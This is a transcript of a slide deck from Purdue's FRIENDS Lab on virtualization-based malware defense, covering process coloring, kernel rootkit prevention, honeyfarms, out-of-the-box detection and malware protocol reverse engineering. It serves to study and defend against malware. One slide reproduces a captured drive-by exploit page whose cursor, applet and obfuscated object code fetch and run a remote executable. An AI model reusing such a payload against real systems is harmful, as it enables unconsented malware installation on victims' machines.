1 / 24

Research at FRIENDS Lab friends.cs.purdue Dongyan Xu Associate Professor

Research at FRIENDS Lab http://friends.cs.purdue.edu Dongyan Xu Associate Professor Department of Computer Science and Center for Education and Research in Information Assurance and Security (CERIAS) Purdue University. Malware Defense Honeyfarm (Collapsar) Playground (vGround)

uzuri
Download Presentation

Research at FRIENDS Lab friends.cs.purdue Dongyan Xu Associate Professor

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Research at FRIENDS Lab http://friends.cs.purdue.edu Dongyan Xu Associate Professor Department of Computer Science and Center for Education and Research in Information Assurance and Security (CERIAS) Purdue University

  2. Malware Defense • Honeyfarm (Collapsar) • Playground (vGround) • VM introspection (OBSERV) • OS info. flow (Proc. Coloring) • Kernel rootkit (NICKLE) • Reverse engr. (AutoFormat) • Virtual Infrastructures • VIOLIN virtual infrastructure • Infrastructure adaptation • Infrastructure snapshot • Real-world deployment • (http://www.nanohub.org) Virtualization Technology (Xen, QEMU, VirtualBox, KVM, VMware) Research Overview

  3. Project 1: Process Coloring: Information Flow-based Malware Defense • Funded by IARPA through AFRL • One-sentence summary: • Propagating and logging provenance information (“colors”) along OS-level information flows for malware detection and sensitive data protection • Prototype integration with Southwest Research Institute • Demo CD completed today!

  4. PC Usage Scenario: Server-Side Malware Defense Capability 1: PC malware alert “No shell process should have the color of Apache” Initial coloring s30sendmail s30sendmail s55sshd s55sshd Syscall Log s45named s45named init rc s80httpd s80httpd • /etc/shadow • Confidential Info httpd netcat Capability 3: Color-based log partition for contamination analysis Local files /bin/sh Capability 2: Color-based identification of malware break-in point Coloring diffusion wget Rootkit Demo at: http://friends.cs.purdue.edu/projects/pc/pc-demo.html

  5. PC Usage Scenario: Client-Side Malware Defense www.malicious.net turbotax Tax warcraft Games notepad Editor firefox Web Browser PC malware alert “Web browser and tax colors should never mix” Agobot Tax files Agobot Demo at: http://friends.cs.purdue.edu/projects/pc/files/sinkfile.avi

  6. Project 2:Strategic Defense against Kernel Rootkit Attacks • Kernel rootkits: stealthy and foundational threat to cyberspace • Current defense: • Symptom-based detection • Disruption to production system • Manual forensics • Strategic defense: • Proactive indication before attack • Automatic avoidance by “steering away” production system (non-stop operation) • Live forensics for future protection

  7. Integrated Defense Scenario Right before attack After threat indication Production VM Forensics VM Production VM Guest OS Guest OS Guest OS Forensics Indication Clean-up VMM VMM VMM Avoidance Fork Rootkit Profile Kernel Guarding Code

  8. Results with Real-World Kernel Rootkits [RAID08 Best Paper Award] • Indicating and preventing kernel rootkit attacks at VMM level

  9. Thank you! For more information: URL:http://friends.cs.purdue.edu(on a VM) Google:“Purdue virtualization friends” Email:dxu@cs.purdue.edu

  10. NICKLE: Kernel Rootkit Indicator “No Instruction Creeping into Kernel Level Executed” • Step 1: Create two memory spaces • Standard memory • Shadow memory • Step 2: Authenticate and copy kernel code to shadow memory • Step 3: Memory access dispatch • Kernel code fetch -> shadow memory • All other accesses -> standard memory Guest OS VMM NICKLE Kernel Code Kernel Code Standard memory Shadow memory

  11. Collapsar Honeyfarm [USENIX Security’04] Domain A Benefit 2: Off-site attack occurrence Redirector Domain C Front-End Redirector Redirector Domain B Collapsar Center VM-based Honeypots Management Station Correlation Engine Benefit 1: Centralized management of honeypots w/ distributed presence Benefit 3: Convenience for real-time attack correlation and log mining Collapsar Honeyfarm

  12. Domain A Malicious Web Server Redirector Domain C Front-End Redirector Redirector Domain B Collapsar Center VM-based Honeypots Collapsar as a Client-side Honeyfarm • Active Honeypots w/ Vulnerable Client-side Software • Web Browsers (e.g., IE, Firefox, …) • Email Clients (e.g., Outlook, …) PlanetLab (310 sites) [ HoneyMonkey, NDSS’06] 288 malicious sites / 2 zero-day exploits

  13. A Real Incident [JPDC’06] • Upon Clicking a malicious URL • http://xxx.9x.xx8.8x/users/xxxx/xxx/laxx/z.html <html><head><title></title></head><body> <style> * {CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr")} </style> <APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1> <PARAM NAME='url' VALUE='http://vxxxxxxe.biz/adverts/033/win32.exe'></APPLET> <script> try{ document.write('<object data=`&#109&#115&#45&#105&#116&#115&#58 &#109&#104&#116&#109&#108&#58&#102&#105&#108&#101&#58; //C:\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+'erts//033//targ.ch'+ 'm::/targ'+'et.htm` type=`text/x-scriptlet`></ob'+'ject>'); }catch(e){}</script> </body></html> MS05-002 MS03-011 MS04-013 22 unwanted programs installed without user’s consent!

  14. vGround: A Virtual Worm Playground(demo) [RAID’05] A Worm Playground • High fidelity • VM: full-system virtualization • Strict confinement • VN: link-layer network virtualization • Easy deployment • Locally deployable • Efficient experiments • Images generation time: 60 seconds • Boot-strap time: 90 seconds • Tear-down time: 10 seconds dallas.cs.purdue.edu In “Fighting Computer Virus Attacks”, Peter Szor, USENIX Security Symp., 2004

  15. State-of-the-art malware defense Running anti-malware software inside the monitored system Advantage: They can see everything (e.g., files, processes…) Disadvantage: They may not see anything! OBSERV: “Out-of-the-Box” Malware Detection IE Firefox VirusScan … OS Kernel

  16. Why “Out-of-the-Box”? Current approach fundamentally flawed Anti-malware software and protected software running at the same privilege level Lack of root-of-trust Solution: Going “out-of-the-box” VirusScan IE Firefox … OS Kernel ? Virtual Machine Monitor (VMM)

  17. The “Semantic-Gap” Challenge What we can observe: Low-level states Memory pages, disk blocks… Low-level events Privileged instructions, Interrupts, I/O… VirusScan Semantic Gap Guest OS Virtual Machine Monitor (e.g., VMware, Xen) • What we want to observe: • High-level semantic states • Files, processes… • high-level semantic events • System calls, context switches…

  18. Our Solution: OBSERV OBSERV: “Out-of-the-Box” with SEmantically Reconstructed View A new mechanism missing in existing VMMs [ACM CCS’07] IE Firefox … OS Kernel OBSERV Virtual Machine Monitor (VMM)

  19. New Capabilities Enabled by OBSERV Inside-the-box View OBSERV View IE Firefox … OS Kernel OBSERV Virtual Machine Monitor (VMM) Diff Capability I: Invisible system logging Capability II: Malware detection by view comparison Capability III: External run of COTS anti-malware software

  20. AutoFormat: Malware Protocol Reverse Engineering [NDSS’08] • Given malware binary, infer malware protocol format

  21. Inferring Slapper Worm (Botnet) Protocol Nested data structure declaration 1 1 2 2 3 Compiler inserted gap

  22. Internet VIOLIN: Portable, Adaptive Virtual Environments [TR’03, IEEE Computer’05] • Adaptive Virtual Environments on a shared hosting infrastructure DB DB

  23. Adaptation Architecture and Sample Scenario (Demo) [IEEE ICAC’06] VMs VMs VIOLIN Switch VIOLIN Switch VIOLIN Switch VIOLIN Switch Monitoring Daemon Monitoring Daemon VMM VMM VMs VMs Physical Network VIOLIN Switch VIOLIN Switch VIOLIN Switch CPU Update Monitoring Daemon Monitoring Daemon Adaptation Manager VMM VMM Scale Up Migrate

  24. Live VIOLIN Snapshot (Demo) [ACM/IEEE VTDC’07] Snapshot Resume • Useful for application and OS transparent recovery from • Crashes, failures, and disasters • Unexpected power/network outage • And for VIOLIN replay Hosting center Hosting center

More Related